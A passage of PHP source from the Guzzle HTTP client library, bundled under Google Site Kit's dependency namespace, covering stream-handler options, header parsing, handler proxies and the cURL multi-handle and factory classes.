'protocol_version' => $request->getProtocolVersion(), 'ignore_errors' => \true, 'follow_location' => 0], 'ssl' => ['peer_name' => $request->getUri()->getHost()]]; $body = (string) $request->getBody(); if ('' !== $body) { $context['http']['content'] = $body; // Prevent the HTTP handler from adding a Content-Type header. if (!$request->hasHeader('Content-Type')) { $context['http']['header'] .= "Content-Type:\r\n"; } } $context['http']['header'] = \rtrim($context['http']['header']); return $context; } /** * @param mixed $value as passed via Request transfer options. */ private function add_proxy(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options, $value, array &$params) : void { $uri = null; if (!\is_array($value)) { $uri = $value; } else { $scheme = $request->getUri()->getScheme(); if (isset($value[$scheme])) { if (!isset($value['no']) || !\Google\Site_Kit_Dependencies\GuzzleHttp\Utils::isHostInNoProxy($request->getUri()->getHost(), $value['no'])) { $uri = $value[$scheme]; } } } if (!$uri) { return; } $parsed = $this->parse_proxy($uri); $options['http']['proxy'] = $parsed['proxy']; if ($parsed['auth']) { if (!isset($options['http']['header'])) { $options['http']['header'] = []; } $options['http']['header'] .= "\r\nProxy-Authorization: {$parsed['auth']}"; } } /** * Parses the given proxy URL to make it compatible with the format PHP's stream context expects. */ private function parse_proxy(string $url) : array { $parsed = \parse_url($url); if ($parsed !== \false && isset($parsed['scheme']) && $parsed['scheme'] === 'http') { if (isset($parsed['host']) && isset($parsed['port'])) { $auth = null; if (isset($parsed['user']) && isset($parsed['pass'])) { $auth = \base64_encode("{$parsed['user']}:{$parsed['pass']}"); } return ['proxy' => "tcp://{$parsed['host']}:{$parsed['port']}", 'auth' => $auth ? "Basic {$auth}" : null]; } } // Return proxy as-is. return ['proxy' => $url, 'auth' => null]; } /** * @param mixed $value as passed via Request transfer options. */ private function add_timeout(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options, $value, array &$params) : void { if ($value > 0) { $options['http']['timeout'] = $value; } } /** * @param mixed $value as passed via Request transfer options. */ private function add_crypto_method(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options, $value, array &$params) : void { if ($value === \STREAM_CRYPTO_METHOD_TLSv1_0_CLIENT || $value === \STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT || $value === \STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT || \defined('STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT') && $value === \STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT) { $options['http']['crypto_method'] = $value; return; } throw new \InvalidArgumentException('Invalid crypto_method request option: unknown version provided'); } /** * @param mixed $value as passed via Request transfer options. */ private function add_verify(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options, $value, array &$params) : void { if ($value === \false) { $options['ssl']['verify_peer'] = \false; $options['ssl']['verify_peer_name'] = \false; return; } if (\is_string($value)) { $options['ssl']['cafile'] = $value; if (!\file_exists($value)) { throw new \RuntimeException("SSL CA bundle not found: {$value}"); } } elseif ($value !== \true) { throw new \InvalidArgumentException('Invalid verify request option'); } $options['ssl']['verify_peer'] = \true; $options['ssl']['verify_peer_name'] = \true; $options['ssl']['allow_self_signed'] = \false; } /** * @param mixed $value as passed via Request transfer options. */ private function add_cert(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options, $value, array &$params) : void { if (\is_array($value)) { $options['ssl']['passphrase'] = $value[1]; $value = $value[0]; } if (!\file_exists($value)) { throw new \RuntimeException("SSL certificate not found: {$value}"); } $options['ssl']['local_cert'] = $value; } /** * @param mixed $value as passed via Request transfer options. */ private function add_progress(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options, $value, array &$params) : void { self::addNotification($params, static function ($code, $a, $b, $c, $transferred, $total) use($value) { if ($code == \STREAM_NOTIFY_PROGRESS) { // The upload progress cannot be determined. Use 0 for cURL compatibility: // https://curl.se/libcurl/c/CURLOPT_PROGRESSFUNCTION.html $value($total, $transferred, 0, 0); } }); } /** * @param mixed $value as passed via Request transfer options. */ private function add_debug(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options, $value, array &$params) : void { if ($value === \false) { return; } static $map = [\STREAM_NOTIFY_CONNECT => 'CONNECT', \STREAM_NOTIFY_AUTH_REQUIRED => 'AUTH_REQUIRED', \STREAM_NOTIFY_AUTH_RESULT => 'AUTH_RESULT', \STREAM_NOTIFY_MIME_TYPE_IS => 'MIME_TYPE_IS', \STREAM_NOTIFY_FILE_SIZE_IS => 'FILE_SIZE_IS', \STREAM_NOTIFY_REDIRECTED => 'REDIRECTED', \STREAM_NOTIFY_PROGRESS => 'PROGRESS', \STREAM_NOTIFY_FAILURE => 'FAILURE', \STREAM_NOTIFY_COMPLETED => 'COMPLETED', \STREAM_NOTIFY_RESOLVE => 'RESOLVE']; static $args = ['severity', 'message', 'message_code', 'bytes_transferred', 'bytes_max']; $value = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::debugResource($value); $ident = $request->getMethod() . ' ' . $request->getUri()->withFragment(''); self::addNotification($params, static function (int $code, ...$passed) use($ident, $value, $map, $args) : void { \fprintf($value, '<%s> [%s] ', $ident, $map[$code]); foreach (\array_filter($passed) as $i => $v) { \fwrite($value, $args[$i] . ': "' . $v . '" '); } \fwrite($value, "\n"); }); } private static function addNotification(array &$params, callable $notify) : void { // Wrap the existing function if needed. if (!isset($params['notification'])) { $params['notification'] = $notify; } else { $params['notification'] = self::callArray([$params['notification'], $notify]); } } private static function callArray(array $functions) : callable { return static function (...$args) use($functions) { foreach ($functions as $fn) { $fn(...$args); } }; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\GuzzleHttp\Utils; /** * @internal */ final class HeaderProcessor { /** * Returns the HTTP version, status code, reason phrase, and headers. * * @param string[] $headers * * @return array{0:string, 1:int, 2:?string, 3:array} * * @throws \RuntimeException */ public static function parseHeaders(array $headers) : array { if ($headers === []) { throw new \RuntimeException('Expected a non-empty array of header data'); } $parts = \explode(' ', \array_shift($headers), 3); $version = \explode('/', $parts[0])[1] ?? null; if ($version === null) { throw new \RuntimeException('HTTP version missing from header data'); } $status = $parts[1] ?? null; if ($status === null) { throw new \RuntimeException('HTTP status code missing from header data'); } return [$version, (int) $status, $parts[2] ?? null, \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::headersFromLines($headers)]; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\RequestOptions; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Provides basic proxies for handlers. * * @final */ class Proxy { /** * Sends synchronous requests to a specific handler while sending all other * requests to another handler. * * @param callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface $default Handler used for normal responses * @param callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface $sync Handler used for synchronous responses. * * @return callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface Returns the composed handler. */ public static function wrapSync(callable $default, callable $sync) : callable { return static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($default, $sync) : PromiseInterface { return empty($options[\Google\Site_Kit_Dependencies\GuzzleHttp\RequestOptions::SYNCHRONOUS]) ? $default($request, $options) : $sync($request, $options); }; } /** * Sends streaming requests to a streaming compatible handler while sending * all other requests to a default handler. * * This, for example, could be useful for taking advantage of the * performance benefits of curl while still supporting true streaming * through the StreamHandler. * * @param callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface $default Handler used for non-streaming responses * @param callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface $streaming Handler used for streaming responses * * @return callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface Returns the composed handler. */ public static function wrapStreaming(callable $default, callable $streaming) : callable { return static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($default, $streaming) : PromiseInterface { return empty($options['stream']) ? $default($request, $options) : $streaming($request, $options); }; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Closure; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Utils; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Returns an asynchronous response using curl_multi_* functions. * * When using the CurlMultiHandler, custom curl options can be specified as an * associative array of curl option constants mapping to values in the * **curl** key of the provided request options. * * @final */ class CurlMultiHandler { /** * @var CurlFactoryInterface */ private $factory; /** * @var int */ private $selectTimeout; /** * @var int Will be higher than 0 when `curl_multi_exec` is still running. */ private $active = 0; /** * @var array Request entry handles, indexed by handle id in `addRequest`. * * @see CurlMultiHandler::addRequest */ private $handles = []; /** * @var array<int, float> An array of delay times, indexed by handle id in `addRequest`. * * @see CurlMultiHandler::addRequest */ private $delays = []; /** * @var array<mixed> An associative array of CURLMOPT_* options and corresponding values for curl_multi_setopt() */ private $options = []; /** @var resource|\CurlMultiHandle */ private $_mh; /** * This handler accepts the following options: * * - handle_factory: An optional factory used to create curl handles * - select_timeout: Optional timeout (in seconds) to block before timing * out while selecting curl handles. Defaults to 1 second. * - options: An associative array of CURLMOPT_* options and * corresponding values for curl_multi_setopt() */ public function __construct(array $options = []) { $this->factory = $options['handle_factory'] ?? new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlFactory(50); if (isset($options['select_timeout'])) { $this->selectTimeout = $options['select_timeout']; } elseif ($selectTimeout = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::getenv('GUZZLE_CURL_SELECT_TIMEOUT')) { @\trigger_error('Since guzzlehttp/guzzle 7.2.0: Using environment variable GUZZLE_CURL_SELECT_TIMEOUT is deprecated. Use option "select_timeout" instead.', \E_USER_DEPRECATED); $this->selectTimeout = (int) $selectTimeout; } else { $this->selectTimeout = 1; } $this->options = $options['options'] ?? []; // unsetting the property forces the first access to go through // __get(). unset($this->_mh); } /** * @param string $name * * @return resource|\CurlMultiHandle * * @throws \BadMethodCallException when another field as `_mh` will be gotten * @throws \RuntimeException when curl can not initialize a multi handle */ public function __get($name) { if ($name !== '_mh') { throw new \BadMethodCallException("Can not get other property as '_mh'."); } $multiHandle = \curl_multi_init(); if (\false === $multiHandle) { throw new \RuntimeException('Can not initialize curl multi handle.'); } $this->_mh = $multiHandle; foreach ($this->options as $option => $value) { // A warning is raised in case of a wrong option. \curl_multi_setopt($this->_mh, $option, $value); } return $this->_mh; } public function __destruct() { if (isset($this->_mh)) { \curl_multi_close($this->_mh); unset($this->_mh); } } public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $easy = $this->factory->create($request, $options); $id = (int) $easy->handle; $promise = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise([$this, 'execute'], function () use($id) { return $this->cancel($id); }); $this->addRequest(['easy' => $easy, 'deferred' => $promise]); return $promise; } /** * Ticks the curl event loop. */ public function tick() : void { // Add any delayed handles if needed. if ($this->delays) { $currentTime = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::currentTime(); foreach ($this->delays as $id => $delay) { if ($currentTime >= $delay) { unset($this->delays[$id]); \curl_multi_add_handle($this->_mh, $this->handles[$id]['easy']->handle); } } } // Run curl_multi_exec in the queue to enable other async tasks to run \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue()->add(\Closure::fromCallable([$this, 'tickInQueue'])); // Step through the task queue which may add additional requests. \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue()->run(); if ($this->active && \curl_multi_select($this->_mh, $this->selectTimeout) === -1) { // Perform a usleep if a select returns -1. // See: https://bugs.php.net/bug.php?id=61141 \usleep(250); } while (\curl_multi_exec($this->_mh, $this->active) === \CURLM_CALL_MULTI_PERFORM) { // Prevent busy looping for slow HTTP requests. \curl_multi_select($this->_mh, $this->selectTimeout); } $this->processMessages(); } /** * Runs \curl_multi_exec() inside the event loop, to prevent busy looping */ private function tickInQueue() : void { if (\curl_multi_exec($this->_mh, $this->active) === \CURLM_CALL_MULTI_PERFORM) { \curl_multi_select($this->_mh, 0); \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue()->add(\Closure::fromCallable([$this, 'tickInQueue'])); } } /** * Runs until all outstanding connections have completed. */ public function execute() : void { $queue = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue(); while ($this->handles || !$queue->isEmpty()) { // If there are no transfers, then sleep for the next delay if (!$this->active && $this->delays) { \usleep($this->timeToNext()); } $this->tick(); } } private function addRequest(array $entry) : void { $easy = $entry['easy']; $id = (int) $easy->handle; $this->handles[$id] = $entry; if (empty($easy->options['delay'])) { \curl_multi_add_handle($this->_mh, $easy->handle); } else { $this->delays[$id] = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::currentTime() + $easy->options['delay'] / 1000; } } /** * Cancels a handle from sending and removes references to it. * * @param int $id Handle ID to cancel and remove. * * @return bool True on success, false on failure. */ private function cancel($id) : bool { if (!\is_int($id)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing an integer to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } // Cannot cancel if it has been processed. if (!isset($this->handles[$id])) { return \false; } $handle = $this->handles[$id]['easy']->handle; unset($this->delays[$id], $this->handles[$id]); \curl_multi_remove_handle($this->_mh, $handle); \curl_close($handle); return \true; } private function processMessages() : void { while ($done = \curl_multi_info_read($this->_mh)) { if ($done['msg'] !== \CURLMSG_DONE) { // if it's not done, then it would be premature to remove the handle. ref https://github.com/guzzle/guzzle/pull/2892#issuecomment-945150216 continue; } $id = (int) $done['handle']; \curl_multi_remove_handle($this->_mh, $done['handle']); if (!isset($this->handles[$id])) { // Probably was cancelled. continue; } $entry = $this->handles[$id]; unset($this->handles[$id], $this->delays[$id]); $entry['easy']->errno = $done['result']; $entry['deferred']->resolve(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlFactory::finish($this, $entry['easy'], $this->factory)); } } private function timeToNext() : int { $currentTime = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::currentTime(); $nextTime = \PHP_INT_MAX; foreach ($this->delays as $time) { if ($time < $nextTime) { $nextTime = $time; } } return (int) \max(0, $nextTime - $currentTime) * 1000000; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; interface CurlFactoryInterface { /** * Creates a cURL handle resource. * * @param RequestInterface $request Request * @param array $options Transfer options * * @throws \RuntimeException when an option cannot be applied */ public function create(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle; /** * Release an easy handle, allowing it to be reused or closed. * * This function must call unset on the easy handle's "handle" property. */ public function release(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy) : void; } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\FulfilledPromise; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\LazyOpenStream; use Google\Site_Kit_Dependencies\GuzzleHttp\TransferStats; use Google\Site_Kit_Dependencies\GuzzleHttp\Utils; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Creates curl resources from a request * * @final */ class CurlFactory implements \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlFactoryInterface { public const CURL_VERSION_STR = 'curl_version'; /** * @deprecated */ public const LOW_CURL_VERSION_NUMBER = '7.21.2'; /** * @var resource[]|\CurlHandle[] */ private $handles = []; /** * @var int Total number of idle handles to keep in cache */ private $maxHandles; /** * @param int $maxHandles Maximum number of idle handles. */ public function __construct(int $maxHandles) { $this->maxHandles = $maxHandles; } public function create(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle { $protocolVersion = $request->getProtocolVersion(); if ('2' === $protocolVersion || '2.0' === $protocolVersion) { if (!self::supportsHttp2()) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException('HTTP/2 is supported by the cURL handler, however libcurl is built without HTTP/2 support.', $request); } } elseif ('1.0' !== $protocolVersion && '1.1' !== $protocolVersion) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException(\sprintf('HTTP/%s is not supported by the cURL handler.', $protocolVersion), $request); } if (isset($options['curl']['body_as_string'])) { $options['_body_as_string'] = $options['curl']['body_as_string']; unset($options['curl']['body_as_string']); } $easy = new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle(); $easy->request = $request; $easy->options = $options; $conf = $this->getDefaultConf($easy); $this->applyMethod($easy, $conf); $this->applyHandlerOptions($easy, $conf); $this->applyHeaders($easy, $conf); unset($conf['_headers']); // Add handler options from the request configuration options if (isset($options['curl'])) { $conf = \array_replace($conf, $options['curl']); } $conf[\CURLOPT_HEADERFUNCTION] = $this->createHeaderFn($easy); $easy->handle = $this->handles ? \array_pop($this->handles) : \curl_init(); \curl_setopt_array($easy->handle, $conf); return $easy; } private static function supportsHttp2() : bool { static $supportsHttp2 = null; if (null === $supportsHttp2) { $supportsHttp2 = self::supportsTls12() && \defined('CURL_VERSION_HTTP2') && \CURL_VERSION_HTTP2 & \curl_version()['features']; } return $supportsHttp2; } private static function supportsTls12() : bool { static $supportsTls12 = null; if (null === $supportsTls12) { $supportsTls12 = \CURL_SSLVERSION_TLSv1_2 & \curl_version()['features']; } return $supportsTls12; } private static function supportsTls13() : bool { static $supportsTls13 = null; if (null === $supportsTls13) { $supportsTls13 = \defined('CURL_SSLVERSION_TLSv1_3') && \CURL_SSLVERSION_TLSv1_3 & \curl_version()['features']; } return $supportsTls13; } public function release(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy) : void { $resource = $easy->handle; unset($easy->handle); if (\count($this->handles) >= $this->maxHandles) { \curl_close($resource); } else { // Remove all callback functions as they can hold onto references // and are not cleaned up by curl_reset. Using curl_setopt_array // does not work for some reason, so removing each one // individually. \curl_setopt($resource, \CURLOPT_HEADERFUNCTION, null); \curl_setopt($resource, \CURLOPT_READFUNCTION, null); \curl_setopt($resource, \CURLOPT_WRITEFUNCTION, null); \curl_setopt($resource, \CURLOPT_PROGRESSFUNCTION, null); \curl_reset($resource); $this->handles[] = $resource; } } /** * Completes a cURL transaction, either returning a response promise or a * rejected promise. * * @param callable(RequestInterface, array): PromiseInterface $handler * @param CurlFactoryInterface $factory Dictates how the handle is released */ public static function finish(callable $handler, \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy, \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlFactoryInterface $factory) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if (isset($easy->options['on_stats'])) { self::invokeStats($easy); } if (!$easy->response || $easy->errno) { return self::finishError($handler, $easy, $factory); } // Return the response if it is present and there is no error. $factory->release($easy); // Rewind the body of the response if possible. $body = $easy->response->getBody(); if ($body->isSeekable()) { $body->rewind(); } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\FulfilledPromise($easy->response); } private static function invokeStats(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy) : void { $curlStats = \curl_getinfo($easy->handle); $curlStats['appconnect_time'] = \curl_getinfo($easy->handle, \CURLINFO_APPCONNECT_TIME); $stats = new \Google\Site_Kit_Dependencies\GuzzleHttp\TransferStats($easy->request, $easy->response, $curlStats['total_time'], $easy->errno, $curlStats); $easy->options['on_stats']($stats); } /** * @param callable(RequestInterface, array): PromiseInterface $handler */ private static function finishError(callable $handler, \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy, \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlFactoryInterface $factory) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { // Get error information and release the handle to the factory. $ctx = ['errno' => $easy->errno, 'error' => \curl_error($easy->handle), 'appconnect_time' => \curl_getinfo($easy->handle, \CURLINFO_APPCONNECT_TIME)] + \curl_getinfo($easy->handle); $ctx[self::CURL_VERSION_STR] = self::getCurlVersion(); $factory->release($easy); // Retry when nothing is present or when curl failed to rewind. if (empty($easy->options['_err_message']) && (!$easy->errno || $easy->errno == 65)) { return self::retryFailedRewind($handler, $easy, $ctx); } return self::createRejection($easy, $ctx); } private static function getCurlVersion() : string { static $curlVersion = null; if (null === $curlVersion) { $curlVersion = \curl_version()['version']; } return $curlVersion; } private static function createRejection(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy, array $ctx) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { static $connectionErrors = [\CURLE_OPERATION_TIMEOUTED => \true, \CURLE_COULDNT_RESOLVE_HOST => \true, \CURLE_COULDNT_CONNECT => \true, \CURLE_SSL_CONNECT_ERROR => \true, \CURLE_GOT_NOTHING => \true]; if ($easy->createResponseException) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor(new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException('An error was encountered while creating the response', $easy->request, $easy->response, $easy->createResponseException, $ctx)); } // If an exception was encountered during the onHeaders event, then // return a rejected promise that wraps that exception. if ($easy->onHeadersException) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor(new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException('An error was encountered during the on_headers event', $easy->request, $easy->response, $easy->onHeadersException, $ctx)); } $uri = $easy->request->getUri(); $sanitizedError = self::sanitizeCurlError($ctx['error'] ?? '', $uri); $message = \sprintf('cURL error %s: %s (%s)', $ctx['errno'], $sanitizedError, 'see https://curl.haxx.se/libcurl/c/libcurl-errors.html'); if ('' !== $sanitizedError) { $redactedUriString = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::redactUserInfo($uri)->__toString(); if ($redactedUriString !== '' && \false === \strpos($sanitizedError, $redactedUriString)) { $message .= \sprintf(' for %s', $redactedUriString); } } // Create a connection exception if it was a specific error code. $error = isset($connectionErrors[$easy->errno]) ? new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException($message, $easy->request, null, $ctx) : new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException($message, $easy->request, $easy->response, null, $ctx); return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($error); } private static function sanitizeCurlError(string $error, \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : string { if ('' === $error) { return $error; } $baseUri = $uri->withQuery('')->withFragment(''); $baseUriString = $baseUri->__toString(); if ('' === $baseUriString) { return $error; } $redactedUriString = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::redactUserInfo($baseUri)->__toString(); return \str_replace($baseUriString, $redactedUriString, $error); } /** * @return array<int|string, mixed> */ private function getDefaultConf(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy) : array { $conf = ['_headers' => $easy->request->getHeaders(), \CURLOPT_CUSTOMREQUEST => $easy->request->getMethod(), \CURLOPT_URL => (string) $easy->request->getUri()->withFragment(''), \CURLOPT_RETURNTRANSFER => \false, \CURLOPT_HEADER => \false, \CURLOPT_CONNECTTIMEOUT => 300]; if (\defined('CURLOPT_PROTOCOLS')) { $conf[\CURLOPT_PROTOCOLS] = \CURLPROTO_HTTP | \CURLPROTO_HTTPS; } $version = $easy->request->getProtocolVersion(); if ('2' === $version || '2.0' === $version) { $conf[\CURLOPT_HTTP_VERSION] = \CURL_HTTP_VERSION_2_0; } elseif ('1.1' === $version) { $conf[\CURLOPT_HTTP_VERSION] = \CURL_HTTP_VERSION_1_1; } else { $conf[\CURLOPT_HTTP_VERSION] = \CURL_HTTP_VERSION_1_0; } return $conf; } private function applyMethod(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy, array &$conf) : void { $body = $easy->request->getBody(); $size = $body->getSize(); if ($size === null || $size > 0) { $this->applyBody($easy->request, $easy->options, $conf); return; } $method = $easy->request->getMethod(); if ($method === 'PUT' || $method === 'POST') { // See https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.2 if (!$easy->request->hasHeader('Content-Length')) { $conf[\CURLOPT_HTTPHEADER][] = 'Content-Length: 0'; } } elseif ($method === 'HEAD') { $conf[\CURLOPT_NOBODY] = \true; unset($conf[\CURLOPT_WRITEFUNCTION], $conf[\CURLOPT_READFUNCTION], $conf[\CURLOPT_FILE], $conf[\CURLOPT_INFILE]); } } private function applyBody(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options, array &$conf) : void { $size = $request->hasHeader('Content-Length') ? (int) $request->getHeaderLine('Content-Length') : null; // Send the body as a string if the size is less than 1MB OR if the // [curl][body_as_string] request value is set. if ($size !== null && $size < 1000000 || !empty($options['_body_as_string'])) { $conf[\CURLOPT_POSTFIELDS] = (string) $request->getBody(); // Don't duplicate the Content-Length header $this->removeHeader('Content-Length', $conf); $this->removeHeader('Transfer-Encoding', $conf); } else { $conf[\CURLOPT_UPLOAD] = \true; if ($size !== null) { $conf[\CURLOPT_INFILESIZE] = $size; $this->removeHeader('Content-Length', $conf); } $body = $request->getBody(); if ($body->isSeekable()) { $body->rewind(); } $conf[\CURLOPT_READFUNCTION] = static function ($ch, $fd, $length) use($body) { return $body->read($length); }; } // If the Expect header is not present, prevent curl from adding it if (!$request->hasHeader('Expect')) { $conf[\CURLOPT_HTTPHEADER][] = 'Expect:'; } // cURL sometimes adds a content-type by default. Prevent this. if (!$request->hasHeader('Content-Type')) { $conf[\CURLOPT_HTTPHEADER][] = 'Content-Type:'; } } private function applyHeaders(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy, array &$conf) : void { foreach ($conf['_headers'] as $name => $values) { foreach ($values as $value) { $value = (string) $value; if ($value === '') { // cURL requires a special format for empty headers. // See https://github.com/guzzle/guzzle/issues/1882 for more details. $conf[\CURLOPT_HTTPHEADER][] = "{$name};"; } else { $conf[\CURLOPT_HTTPHEADER][] = "{$name}: {$value}"; } } } // Remove the Accept header if one was not set if (!$easy->request->hasHeader('Accept')) { $conf[\CURLOPT_HTTPHEADER][] = 'Accept:'; } } /** * Remove a header from the options array. * * @param string $name Case-insensitive header to remove * @param array $options Array of options to modify */ private function removeHeader(string $name, array &$options) : void { foreach (\array_keys($options['_headers']) as $key) { if (!\strcasecmp($key, $name)) { unset($options['_headers'][$key]); return; } } } private function applyHandlerOptions(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy, array &$conf) : void { $options = $easy->options; if (isset($options['verify'])) { if ($options['verify'] === \false) { unset($conf[\CURLOPT_CAINFO]); $conf[\CURLOPT_SSL_VERIFYHOST] = 0; $conf[\CURLOPT_SSL_VERIFYPEER] = \false; } else { $conf[\CURLOPT_SSL_VERIFYHOST] = 2; $conf[\CURLOPT_SSL_VERIFYPEER] = \true; if (\is_string($options['verify'])) { // Throw an error if the file/folder/link path is not valid or doesn't exist. if (!\file_exists($options['verify'])) { throw new \InvalidArgumentException("SSL CA bundle not found: {$options['verify']}"); } // If it's a directory or a link to a directory use CURLOPT_CAPATH. // If not, it's probably a file, or a link to a file, so use CURLOPT_CAINFO. if (\is_dir($options['verify']) || \is_link($options['verify']) === \true && ($verifyLink = \readlink($options['verify'])) !== \false && \is_dir($verifyLink)) { $conf[\CURLOPT_CAPATH] = $options['verify']; } else { $conf[\CURLOPT_CAINFO] = $options['verify']; } } } } if (!isset($options['curl'][\CURLOPT_ENCODING]) && !empty($options['decode_content'])) { $accept = $easy->request->getHeaderLine('Accept-Encoding'); if ($accept) { $conf[\CURLOPT_ENCODING] = $accept; } else { // The empty string enables all available decoders and implicitly // sets a matching 'Accept-Encoding' header. $conf[\CURLOPT_ENCODING] = ''; // But as the user did not specify any encoding preference, // let's leave it up to server by preventing curl from sending // the header, which will be interpreted as 'Accept-Encoding: *'. // https://www.rfc-editor.org/rfc/rfc9110#field.accept-encoding $conf[\CURLOPT_HTTPHEADER][] = 'Accept-Encoding:'; } } if (!isset($options['sink'])) { // Use a default temp stream if no sink was set. $options['sink'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::tryFopen('php://temp', 'w+'); } $sink = $options['sink']; if (!\is_string($sink)) { $sink = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($sink); } elseif (!\is_dir(\dirname($sink))) { // Ensure that the directory exists before failing in curl. throw new \RuntimeException(\sprintf('Directory %s does not exist for sink value of %s', \dirname($sink), $sink)); } else { $sink = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\LazyOpenStream($sink, 'w+'); } $easy->sink = $sink; $conf[\CURLOPT_WRITEFUNCTION] = 